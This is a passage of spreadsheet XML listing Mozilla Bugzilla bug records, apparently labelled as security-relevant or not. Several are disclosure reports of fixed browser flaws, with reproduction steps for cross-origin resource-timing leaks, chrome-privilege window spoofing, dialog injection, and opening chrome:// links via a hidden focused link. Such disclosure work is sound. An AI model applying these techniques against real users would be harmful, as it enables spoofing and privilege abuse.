    performance.getEntriesByType("resource")
This scenario also reproduces for cross-origin navigations, which is why this can pose a security and privacy issue, considering that any page can detect and capture some of the requests sent by the previous page.
Steps to Reproduce:
Attached are two files used as test pages to reproduce this bug. Each page will attach a handler to the "unload" event which will perform an external request with an identifier for the current page. This request has the format:
http://www.google-analytics.com/r/collect?dl={{current page}}
Additionally, when the page initially loads, with a 2 delay, a list of resources for the current page will be populated in the "Current list of resources" section, extracted by calling "performance.getEntriesByType('resource')".
1. Ensure any "AdBlock" extensions are disabled before opening these test pages. They might block the external request.​
2. Open "page1.html" in Firefox
3. Wait 2 seconds for the list of resources to be displayed. The initial list should be empty as the first page hasn't made any requests yet.
4. Press the bottom link to navigate to the next page.
5. Wait 2 seconds for the new list of resources to be displayed. This time, we see the list consists of a single request to "http://www.google-analytics.com" sent by the previous page.
Actual results:
The list of resources should be empty on both accounts, for page1 and for page2, as the requests are made after the initial 2 seconds delay, during the "unload" event.
Expected results:
On page2, there is a single request made by page1. In essence, page2 has captured a request made by page1.
We've tested this scenario on Chrome and IE11, and in both cases, the lists of resources are empty.</t>
        </is>
      </c>
      <c r="X2770" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2771">
      <c r="A2771" t="n">
        <v>744888</v>
      </c>
      <c r="B2771" t="inlineStr">
        <is>
          <t>2012-04-12 12:12:35 -0700</t>
        </is>
      </c>
      <c r="C2771" t="inlineStr">
        <is>
          <t>Work around NVIDIA driver bug in glBufferData</t>
        </is>
      </c>
      <c r="D2771" t="inlineStr">
        <is>
          <t>2012-08-02 13:04:05 -0700</t>
        </is>
      </c>
      <c r="E2771" t="n">
        <v>1</v>
      </c>
      <c r="F2771" t="n">
        <v>1</v>
      </c>
      <c r="G2771" t="n">
        <v>3</v>
      </c>
      <c r="H2771" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2771" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2771" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2771" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2771" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2771" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2771" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2771" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2771" t="inlineStr">
        <is>
          <t>[qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2771" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2771" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2771" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T2771" t="n">
        <v>1</v>
      </c>
      <c r="U2771" t="n">
        <v>0</v>
      </c>
      <c r="V2771" t="n">
        <v>32</v>
      </c>
      <c r="W2771" t="inlineStr">
        <is>
          <t>Thanks to Ken/Google for letting us know about this. My understanding of
  http://code.google.com/p/chromium/issues/detail?id=118970
is that the NVIDIA drivers have a bug: glBufferData with null data doesn't actually allocate the buffer until actual data is uploaded to it.
This affects WebGL. We could work around this in 2 different places in WebGL (in WebGL bufferData and in the attrib 0 emulation code), but instead, I think that this is best handled at the level of GLContext.</t>
        </is>
      </c>
      <c r="X2771" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2772">
      <c r="A2772" t="n">
        <v>244965</v>
      </c>
      <c r="B2772" t="inlineStr">
        <is>
          <t>2004-05-28 06:47:17 -0700</t>
        </is>
      </c>
      <c r="C2772" t="inlineStr">
        <is>
          <t>Untrusted web content can display content using "chrome" flag in window.open</t>
        </is>
      </c>
      <c r="D2772" t="inlineStr">
        <is>
          <t>2011-08-05 21:31:39 -0700</t>
        </is>
      </c>
      <c r="E2772" t="n">
        <v>1</v>
      </c>
      <c r="F2772" t="n">
        <v>1</v>
      </c>
      <c r="G2772" t="n">
        <v>3</v>
      </c>
      <c r="H2772" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2772" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2772" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2772" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2772" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2772" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2772" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2772" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2772" t="inlineStr">
        <is>
          <t>[sg:fix]fixed-aviary1.0</t>
        </is>
      </c>
      <c r="Q2772" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2772" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2772" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2772" t="n">
        <v>1</v>
      </c>
      <c r="U2772" t="n">
        <v>0</v>
      </c>
      <c r="V2772" t="n">
        <v>52</v>
      </c>
      <c r="W2772" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040514
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040514
An untrusted web page can use the "chrome" flag in window.open to display remote
XUL content without any indication it's not the browser's own UI.
Reproducible: Always
Steps to Reproduce:
1. Load http://silver.warwickcompsoc.co.uk/cps/admin.html
2. Click the link.
Actual Results:  
The remote XUL window opens without any hints it's remote content.
Expected Results:  
A security exception or the 'chrome' flag being ignored.</t>
        </is>
      </c>
      <c r="X2772" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2773">
      <c r="A2773" t="n">
        <v>578687</v>
      </c>
      <c r="B2773" t="inlineStr">
        <is>
          <t>2010-07-14 08:36:53 -0700</t>
        </is>
      </c>
      <c r="C2773" t="inlineStr">
        <is>
          <t>Add support for Content crashes (tracker)</t>
        </is>
      </c>
      <c r="D2773" t="inlineStr">
        <is>
          <t>2012-01-12 20:40:29 -0800</t>
        </is>
      </c>
      <c r="E2773" t="n">
        <v>1</v>
      </c>
      <c r="F2773" t="n">
        <v>1</v>
      </c>
      <c r="G2773" t="n">
        <v>4</v>
      </c>
      <c r="H2773" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2773" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2773" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2773" t="inlineStr">
        <is>
          <t>1.7</t>
        </is>
      </c>
      <c r="L2773" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2773" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2773" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2773" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2773" t="inlineStr">
        <is>
          <t>Q42011wanted</t>
        </is>
      </c>
      <c r="Q2773" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2773" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2773" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T2773" t="n">
        <v>1</v>
      </c>
      <c r="U2773" t="n">
        <v>0</v>
      </c>
      <c r="V2773" t="n">
        <v>24</v>
      </c>
      <c r="W2773" t="inlineStr">
        <is>
          <t>Jetpack crashes will be ProcessType=jetpack
Content crashes will be ProcessType=content
Jetpack crashes will also have a JetpackID and a JetpackName
Todo list:
- Add Hbase support (deinspanjer)
- Add PG support (lars or ozten)
- Changes to processor (lars)
- Changes to UI (ozten/ryan/laura)
- Icons for the UI (chowse)
bsmedberg says these will start appearing in about two weeks but we can push this out in 1.8, no need for a special release.
I'll file separate bugs shortly.</t>
        </is>
      </c>
      <c r="X2773" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2774">
      <c r="A2774" t="n">
        <v>529546</v>
      </c>
      <c r="B2774" t="inlineStr">
        <is>
          <t>2009-11-18 08:47:36 -0800</t>
        </is>
      </c>
      <c r="C2774" t="inlineStr">
        <is>
          <t>Unnecessary pagination shows up for only two favorited Personas</t>
        </is>
      </c>
      <c r="D2774" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E2774" t="n">
        <v>1</v>
      </c>
      <c r="F2774" t="n">
        <v>1</v>
      </c>
      <c r="G2774" t="n">
        <v>6</v>
      </c>
      <c r="H2774" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2774" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J2774" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K2774" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2774" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2774" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2774" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2774" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2774" t="inlineStr"/>
      <c r="Q2774" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2774" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2774" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T2774" t="n">
        <v>1</v>
      </c>
      <c r="U2774" t="n">
        <v>0</v>
      </c>
      <c r="V2774" t="n">
        <v>4</v>
      </c>
      <c r="W2774" t="inlineStr">
        <is>
          <t>Created attachment 413089
Screenshot
STR:
1. Add just a couple Personas to your My Favorites list (while signed in)
2. Load http://sm-personas01.mozilla.org/en-US/gallery/All/Favorites
3. Click on the pagination
Expected Results:
There should be no pagination for only two Personas
Actual Results:
See screenshot; pagination shows 379 pages</t>
        </is>
      </c>
      <c r="X2774" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2775">
      <c r="A2775" t="n">
        <v>1365875</v>
      </c>
      <c r="B2775" t="inlineStr">
        <is>
          <t>2017-05-18 02:02:45 -0700</t>
        </is>
      </c>
      <c r="C2775" t="inlineStr">
        <is>
          <t>Firefox allows you to insert confirm/alert/prompt dialog in any domain</t>
        </is>
      </c>
      <c r="D2775" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:31 -0700</t>
        </is>
      </c>
      <c r="E2775" t="n">
        <v>1</v>
      </c>
      <c r="F2775" t="n">
        <v>1</v>
      </c>
      <c r="G2775" t="n">
        <v>6</v>
      </c>
      <c r="H2775" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2775" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J2775" t="inlineStr">
        <is>
          <t>Notifications and Alerts</t>
        </is>
      </c>
      <c r="K2775" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L2775" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2775" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2775" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2775" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2775" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2775" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2775" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2775" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T2775" t="n">
        <v>1</v>
      </c>
      <c r="U2775" t="n">
        <v>0</v>
      </c>
      <c r="V2775" t="n">
        <v>40</v>
      </c>
      <c r="W2775" t="inlineStr">
        <is>
          <t>Created attachment 8868929
permission-prompt.webm
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
1- Go to http://createcharts.esy.es/permission-prompt.html
2- Click button
Tested in:
Firefox Nightly 55.0a1 (2017-05-17) (64-bit)
Firefox Developer Edition 54.0a2 (2017-04-18) (32-bits)
Firefox 53.0.2 (32-bit)
Actual results:
Permission Prompt not correctly dismissed on top window navigation</t>
        </is>
      </c>
      <c r="X2775" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2776">
      <c r="A2776" t="n">
        <v>1101284</v>
      </c>
      <c r="B2776" t="inlineStr">
        <is>
          <t>2014-11-18 17:10:03 -0800</t>
        </is>
      </c>
      <c r="C2776" t="inlineStr">
        <is>
          <t>Can't upload operator shelf images</t>
        </is>
      </c>
      <c r="D2776" t="inlineStr">
        <is>
          <t>2014-11-29 21:47:08 -0800</t>
        </is>
      </c>
      <c r="E2776" t="n">
        <v>1</v>
      </c>
      <c r="F2776" t="n">
        <v>1</v>
      </c>
      <c r="G2776" t="n">
        <v>6</v>
      </c>
      <c r="H2776" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2776" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2776" t="inlineStr">
        <is>
          <t>Curation Tools</t>
        </is>
      </c>
      <c r="K2776" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L2776" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2776" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2776" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2776" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2776" t="inlineStr"/>
      <c r="Q2776" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2776" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2776" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2776" t="n">
        <v>1</v>
      </c>
      <c r="U2776" t="n">
        <v>0</v>
      </c>
      <c r="V2776" t="n">
        <v>8</v>
      </c>
      <c r="W2776" t="inlineStr">
        <is>
          <t>To reproduce:
1) Load https://marketplace.allizom.org/curate/create/shelves
2) Try to upload a correctly sized image (see bug 1049471 for some already made images)
3) See a lightbox image editor saying "Your photo is smaller than the required size.  Please choose a new one to proceed."
Marking this as a blocker as people are flying to MV tomorrow at 9am for a demo and I'm unable to make their operator shelf.  Assigning to chuck, as I think he's the go-to guy for this code and in an earlier timezone so this can hopefully be fixed (note it also needs to go to stage, unless you can talk Scott into using -dev for the demo).  Also needinfo'ing scott so he can be aware of this.</t>
        </is>
      </c>
      <c r="X2776" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2777">
      <c r="A2777" t="n">
        <v>1780571</v>
      </c>
      <c r="B2777" t="inlineStr">
        <is>
          <t>2022-07-21 07:38:47 -0700</t>
        </is>
      </c>
      <c r="C2777" t="inlineStr">
        <is>
          <t>Username leaked to form history</t>
        </is>
      </c>
      <c r="D2777" t="inlineStr">
        <is>
          <t>2022-10-25 11:29:13 -0700</t>
        </is>
      </c>
      <c r="E2777" t="n">
        <v>1</v>
      </c>
      <c r="F2777" t="n">
        <v>1</v>
      </c>
      <c r="G2777" t="n">
        <v>3</v>
      </c>
      <c r="H2777" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2777" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2777" t="inlineStr">
        <is>
          <t>Form Manager</t>
        </is>
      </c>
      <c r="K2777" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2777" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2777" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2777" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2777" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2777" t="inlineStr">
        <is>
          <t>[adv-main106+]</t>
        </is>
      </c>
      <c r="Q2777" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2777" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2777" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T2777" t="n">
        <v>1</v>
      </c>
      <c r="U2777" t="n">
        <v>0</v>
      </c>
      <c r="V2777" t="n">
        <v>13</v>
      </c>
      <c r="W2777" t="inlineStr">
        <is>
          <t>STR
1. verify formhistory.sqlite is empty
2. go [imdb login page](https://www.imdb.com/ap/signin?openid.pape.max_auth_age=0&amp;openid.return_to=https%3A%2F%2Fwww.imdb.com%2Fregistration%2Fap-signin-handler%2Fimdb_us&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.assoc_handle=imdb_us&amp;openid.mode=checkid_setup&amp;siteState=eyJvcGVuaWQuYXNzb2NfaGFuZGxlIjoiaW1kYl91cyIsInJlZGlyZWN0VG8iOiJodHRwczovL3d3dy5pbWRiLmNvbS8_cmVmXz1sb2dpbiJ9&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;tag=imdbtag_reg-20) (or any other login page)
3. attempt to login and save login in password manager
4. formhistory.sqlite will have username stored in plain text</t>
        </is>
      </c>
      <c r="X2777" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2778">
      <c r="A2778" t="n">
        <v>878703</v>
      </c>
      <c r="B2778" t="inlineStr">
        <is>
          <t>2013-06-02 23:53:47 -0700</t>
        </is>
      </c>
      <c r="C2778" t="inlineStr">
        <is>
          <t>Cleanup usage of IO thread only objects</t>
        </is>
      </c>
      <c r="D2778" t="inlineStr">
        <is>
          <t>2014-11-19 20:02:57 -0800</t>
        </is>
      </c>
      <c r="E2778" t="n">
        <v>1</v>
      </c>
      <c r="F2778" t="n">
        <v>1</v>
      </c>
      <c r="G2778" t="n">
        <v>3</v>
      </c>
      <c r="H2778" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2778" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2778" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K2778" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2778" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2778" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2778" t="inlineStr">
        <is>
          <t>[adv-main23+]</t>
        </is>
      </c>
      <c r="Q2778" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2778" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2778" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2778" t="n">
        <v>1</v>
      </c>
      <c r="U2778" t="n">
        <v>0</v>
      </c>
      <c r="V2778" t="n">
        <v>12</v>
      </c>
      <c r="W2778" t="inlineStr">
        <is>
          <t>Created attachment 757241
patch v0.1
mFileManagerInfos member in IndexedDatabaseManager supposed to be touched only on the IO thread, unfortunately it is not.
This patch fixes it and also adds AssertIsOnIOThread() to all IO thread only methods to make the thread they are running on more obvious.
Temp storage implementation depends on this fix.</t>
        </is>
      </c>
      <c r="X2778" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2779">
      <c r="A2779" t="n">
        <v>833497</v>
      </c>
      <c r="B2779" t="inlineStr">
        <is>
          <t>2013-01-22 11:44:49 -0800</t>
        </is>
      </c>
      <c r="C2779" t="inlineStr">
        <is>
          <t>Support attachments in the reviewer tools</t>
        </is>
      </c>
      <c r="D2779" t="inlineStr">
        <is>
          <t>2013-03-14 10:51:35 -0700</t>
        </is>
      </c>
      <c r="E2779" t="n">
        <v>1</v>
      </c>
      <c r="F2779" t="n">
        <v>1</v>
      </c>
      <c r="G2779" t="n">
        <v>6</v>
      </c>
      <c r="H2779" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2779" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2779" t="inlineStr">
        <is>
          <t>Reviewer Tools</t>
        </is>
      </c>
      <c r="K2779" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2779" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2779" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2779" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2779" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2779" t="inlineStr">
        <is>
          <t>u=rev p=3</t>
        </is>
      </c>
      <c r="Q2779" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2779" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2779" t="inlineStr">
        <is>
          <t>2013-03-14</t>
        </is>
      </c>
      <c r="T2779" t="n">
        <v>1</v>
      </c>
      <c r="U2779" t="n">
        <v>0</v>
      </c>
      <c r="V2779" t="n">
        <v>12</v>
      </c>
      <c r="W2779" t="inlineStr">
        <is>
          <t>This bug might need broken down further.
The reviewers have asked to be able to add attachments to new (note: not existing) comments.  
These will probably be in a new directory on disk.  Make sure to create it if it doesn't exist and add a permission check to the nagios page.  On the front end, the attachments should be behind reviewer auth and not come off the CDN since they might be private.
Here are some mockups (prepare to roll your eyes at google's UX):
&gt; Desktop Upload: https://docs.google.com/file/d/0B96RwPRmGwk7QmIya09IUTVvNVU/edit
&gt; Mobile Upload: https://docs.google.com/a/mozilla.com/file/d/0B96RwPRmGwk7Y3pJaG9XUnNDRHM/edit
&gt; Desktop View: https://docs.google.com/a/mozilla.com/file/d/0B96RwPRmGwk7akduT2RKeWNQWjA/edit
&gt; Mobile View: https://docs.google.com/a/mozilla.com/file/d/0B96RwPRmGwk7bUZQYUdvSWIxcWM/edit
I don't actually care too much about the desktop vs mobile view mockups - if it's a lot of work just use the mobile one for both.  Icons can be generic, no need to do actual previews.
Figure out something reasonable for file sizes - 5mb?</t>
        </is>
      </c>
      <c r="X2779" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2780">
      <c r="A2780" t="n">
        <v>1111960</v>
      </c>
      <c r="B2780" t="inlineStr">
        <is>
          <t>2014-12-15 20:46:44 -0800</t>
        </is>
      </c>
      <c r="C2780" t="inlineStr">
        <is>
          <t>Open any pseudo URL (e.g. chrome://) when manually calling a link in a new tab</t>
        </is>
      </c>
      <c r="D2780" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:58 -0700</t>
        </is>
      </c>
      <c r="E2780" t="n">
        <v>1</v>
      </c>
      <c r="F2780" t="n">
        <v>1</v>
      </c>
      <c r="G2780" t="n">
        <v>2</v>
      </c>
      <c r="H2780" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2780" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2780" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2780" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L2780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2780" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2780" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2780" t="inlineStr">
        <is>
          <t>[adv-main36+][b2g-affected?][adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q2780" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2780" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2780" t="inlineStr">
        <is>
          <t>Firefox 41</t>
        </is>
      </c>
      <c r="T2780" t="n">
        <v>1</v>
      </c>
      <c r="U2780" t="n">
        <v>0</v>
      </c>
      <c r="V2780" t="n">
        <v>34</v>
      </c>
      <c r="W2780" t="inlineStr">
        <is>
          <t>Created attachment 8536958
tab_open.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Build ID: 20141201171754
Steps to reproduce:
(I admit that this report is a little awkward, but a serious impact is given anyways.)
If you force a link to a new tab or window by holding CTRL or SHIFT, every href url will be openend, regardless of the security context.
Steps:
- Create an &lt;a&gt; link to a chrome:// or file:// url.
- Trigger the link while holding the SHIFT or CTRL key.
- The specified url will be loaded, disregarding all context restrictions.
A sneaky attack could take advantage of the fact that SHIFT+CR is a common user action. (In Facebook's chat for instance, this will expand your input box with a newline char instead of submitting the text.)
So, if you focus() a hidden link on page load, pressing SHIFT + ENTER in any context is sufficient to potentially compromise your system. Besides that, a lot of people should be used to CTRL-open most links anyways and will therefore be an easy target.
The superfluously attached proof of concept will open chrome://browser/content/blockedSite.xhtml.
Expected results:
Links should respect equal context restrictions for every way of invocation.</t>
        </is>
      </c>
      <c r="X2780" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2781">
      <c r="A2781" t="n">
        <v>116305</v>
      </c>
      <c r="B2781" t="inlineStr">
        <is>
          <t>2001-12-20 15:01:48 -0800</t>
        </is>
      </c>
      <c r="C2781" t="inlineStr">
        <is>
          <t>Crash with LDAP SSL in web server GAT</t>
        </is>
      </c>
      <c r="D2781" t="inlineStr">
        <is>
          <t>2002-01-09 19:21:50 -0800</t>
        </is>
      </c>
      <c r="E2781" t="n">
        <v>1</v>
      </c>
      <c r="F2781" t="n">
        <v>1</v>
      </c>
      <c r="G2781" t="n">
        <v>3</v>
      </c>
      <c r="H2781" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2781" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2781" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2781" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="L2781" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M2781" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N2781" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2781" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2781" t="inlineStr"/>
      <c r="Q2781" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2781" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2781" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="T2781" t="n">
        <v>1</v>
      </c>
      <c r="U2781" t="n">
        <v>0</v>
      </c>
      <c r="V2781" t="n">
        <v>5</v>
      </c>
      <c r="W2781" t="inlineStr">
        <is>
          <t>t@55 (l@42) terminated by signal SEGV (no mapping at the fault address)
Current function is nss_certificate_hash
  643           h = (h &gt;&gt; 28) ^ (h &lt;&lt; 4) ^ ((unsigned char *)c-&gt;issuer.data)[i];
(dbx) where
current thread: t@55
=&gt;[1] nss_certificate_hash(key = 0x81cc70), line 643 in "pkistore.c"
  [2] PL_HashTableLookup(ht = 0x78660, key = 0x81cc70), line 387 in "plhash.c"
  [3] nssHash_Exists(hash = 0x78640, it = 0x81cc70), line 329 in "hash.c"
  [4] nssTrustDomain_RemoveCertFromCache(td = 0x77e08, cert = 0x81cc70), line
359 in "tdcache.c"
  [5] CERT_DestroyCertificate(cert = 0x81c450), line 418 in "stanpcertdb.c"
  [6] ssl3_CleanupPeerCerts(ssl3 = 0x7f9560), line 6378 in "ssl3con.c"
  [7] ssl3_HandleCertificate(ss = 0x7e9808, b = 0x814847 "^M", length = 0), line
6678 in "ssl3con.c"
  [8] ssl3_HandleHandshakeMessage(ss = 0x7e9808, b = 0x8143de "", length =
1129U), line 7150 in "ssl3con.c"
  [9] ssl3_HandleHandshake(ss = 0x7e9808, origBuf = 0x7ebfdc), line 7266 in
"ssl3con.c"
  [10] ssl3_HandleRecord(ss = 0x7e9808, cText = 0xfcc2d90c, databuf = 0x7ebfdc),
line 7531 in "ssl3con.c"
  [11] ssl3_GatherCompleteHandshake(ss = 0x7e9808, flags = 0), line 204 in
"ssl3gthr.c"
